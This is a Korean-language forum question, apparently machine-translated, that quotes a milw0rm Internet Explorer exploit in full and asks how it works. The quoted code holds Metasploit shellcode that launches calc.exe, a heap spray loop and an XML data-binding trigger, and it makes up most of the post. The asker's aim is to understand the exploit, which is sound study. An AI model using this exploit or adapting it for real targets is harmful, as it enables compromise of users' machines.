나는 일반적으로 JavaScript 코드를 읽는 데 어려움이 없지만이 코드는 논리를 알 수 없습니다. 이 코드는 4 일 전에 게시 된 악용 코드입니다. 당신은 그것을 찾을 수 있습니다milw0rm .
코드는 다음과 같습니다.
<html>
<div id="replace">x</div>
<script>
// windows/exec - 148 bytes
// http://www.metasploit.com
// Encoder: x86/shikata_ga_nai
// EXITFUNC=process, CMD=calc.exe
var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");
// ugly heap spray, the d0nkey way!
// works most of the time
var spray = unescape("%u0a0a%u0a0a");
do {
spray += spray;
} while(spray.length < 0xd0000);
memory = new Array();
for(i = 0; i < 100; i++)
memory[i] = spray + shellcode;
xmlcode = "<XML ID=I><X><C><![CDATA[<image SRC=http://ਊਊ.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";
tag = document.getElementById("replace");
tag.innerHTML = xmlcode;
</script>
</html>
여기에 내가 믿은 바가 있으며, 내가 오해하는 부분을 도와주십시오.
변수 shellcode
에는를 여는 코드가 포함되어 있습니다 calc.exe
. 나는 그들이 그 이상한 문자열을 어떻게 찾았는지 알지 못한다. 어떤 생각?
두 번째는 변수 spray
입니다. 이 이상한 루프를 이해하지 못합니다.
세 번째는 memory
어디에도 사용되지 않는 변수 입니다. 그들은 왜 그것을 만드는가?
마지막으로 : 페이지에서 XML 태그는 무엇을합니까?
현재로서는 좋은 답변이 있지만 대부분 매우 일반적인 답변이 있습니다. 코드 값에 대한 자세한 설명을 원합니다. 예는 unescape("%u0a0a%u0a0a");
입니다. 무슨 뜻인가요? 루프에 대해 같은 것 : 개발자가 쓴 이유 : length < 0xd0000
? 이 코드의 이론뿐만 아니라 더 깊은 이해를 원합니다.